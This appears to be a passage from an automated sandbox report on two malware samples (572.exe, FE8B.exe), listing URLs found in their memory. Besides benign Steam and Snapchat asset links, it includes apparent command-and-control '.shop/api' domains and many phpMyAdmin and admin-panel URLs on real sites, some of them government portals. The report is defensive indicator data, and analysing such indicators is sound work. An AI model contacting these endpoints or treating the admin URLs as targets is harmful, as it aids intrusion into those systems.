                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.secure.imvu.com/store/
                Source: 572.exe, 00000009.00000003.4199132686.0000000039116000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.0000000039116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pxndx-mcr.boletia.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pxndx-mcr.boletia.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4390567048.00000000391F5000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4337138614.000000004DACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rage.mp/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4337138614.000000004DACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rage.mp/phpMyAdmin/phpQC
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: FE8B.exe, 00000007.00000002.2647046758.00000000010F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/
                Source: FE8B.exe, 00000007.00000002.2647046758.00000000010F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/api
                Source: 572.exe, 00000009.00000003.4315918557.000000004E155000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.000000003911E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ro.bongacams.com/administrator
                Source: 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ro.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4533691780.00000000056FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ro.bongacams.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ro.bongacams.com/phpmyadminB
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rs.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ru2.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4502455045.00000000058C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.rsg.sc/auth
                Source: 572.exe, 00000009.00000003.4373068023.0000000047B9C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.rsg.sc/auth/js/20240115bebh/build/
                Source: 572.exe, 00000009.00000003.4373068023.0000000047B9C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.rsg.sc/auth/js/20240115bebh/build/app.3b89110af7763a7757ab.css
                Source: 572.exe, 00000009.00000003.4373068023.0000000047B9C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.rsg.sc/auth/js/20240115bebh/build/app.cd19928687eacc1633ca.js
                Source: 572.exe, 00000009.00000003.4373068023.0000000047B9C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.rsg.sc/auth/js/20240115bebh/build/locale-en-US-json.b896ace675a2c4c4070a.bundle.js
                Source: 572.exe, 00000009.00000003.4373068023.0000000047B9C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.rsg.sc/auth/js/20240115bebh/build/runtime.01dea1afa91c8b7a7664.js
                Source: 572.exe, 00000009.00000003.4373068023.0000000047B9C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.rsg.sc/auth/rockstar.ico
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s163-es.ogame.gameforge.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s163-es.ogame.gameforge.com/phpmyadmin/n
                Source: 572.exe, 00000009.00000003.2493956741.0000000002BED000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2495235862.0000000002C13000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2470228405.0000000003622000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2468189486.00000000034D3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2496053848.0000000002C03000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2497481349.0000000002C0F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2481604946.00000000038C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sabotage.net
                Source: 572.exe, 00000009.00000003.4304769446.00000000401DC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.paywithmybank.com/;worker-src
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sc-oauth2-client-icons-dev.storage.googleapis.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sc-oauth2-client-icons.storage.googleapis.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sc-static.net
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://schema.org/BreadcrumbList
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://schema.org/ListItem
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdk.bitmoji.com;
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://se.bongacams.com/phpmyadmin
                Source: FE8B.exe, 00000007.00000003.2450711514.0000000001133000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000003.2429068251.0000000001134000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000002.2647046758.0000000001135000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretionsuitcasenioise.shop/
                Source: FE8B.exe, 00000007.00000003.2429068251.0000000001134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretionsuitcasenioise.shop/api
                Source: FE8B.exe, 00000007.00000003.2450711514.0000000001133000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000003.2429068251.0000000001134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretionsuitcasenioise.shop/apib
                Source: FE8B.exe, 00000007.00000003.2429068251.0000000001134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretionsuitcasenioise.shop:443/api
                Source: 572.exe, 00000009.00000003.4163206048.0000000040186000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.00000000391EC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4387562949.00000000403AE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4286826015.000000007FDFC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4401816982.00000000392B7000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304582370.00000000404EC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039148000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sentry.sc-prod.net
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://service.uan.edu.co/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicios.sat.gob.mx/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicios.sat.gob.mx/phpmyadmin/2(
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDF8000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.00000000391CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicossociais.caixa.gov.br/administrator/index.php
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shared.cloudflare.steamstatic.com/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shophappy.zoom.us
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://si.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sigapbanjarmasin.info/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signin.rockstargames.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signin.rockstargames.com/phpmyadmin/9
                Source: 572.exe, 00000009.00000003.4306089773.000000004E7CE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4523052924.000000004E06F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signin.rockstargames.com/wp-admin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E7CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signin.rockstargames.com/wp-admin/ndex.php
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sii.ittlahuac.edu.mx/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sii.ittlahuac.edu.mx/phpmyadmin/0)vI
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sii.ittlahuac.edu.mx/phpmyadmin/Jw
                Source: 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sistemas.pa.gov.br/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sistemas.pa.gov.br/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sk.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://snap-api.arkoselabs.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://snap-api.arkoselabs.com/
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://snap-profile-manager.snapchat.com
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=Grv-5yNFuEfg&amp;l=english&
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=2C1Oh9QFVTyK&amp;l=engl
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2U002L4q3GO-&amp;l=en
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=CG8Em6e-Ozq3&amp;
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/images/trans.gif
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/javascript/jquery-1.8.3.min.js?v=.TZ2NKhB-nli
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=MPo6_B4f_g7D&am
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp;_cd
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.s
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.c
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/?snr=1_4_4__global-header
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/?snr=1_4_4__global-responsive-menu
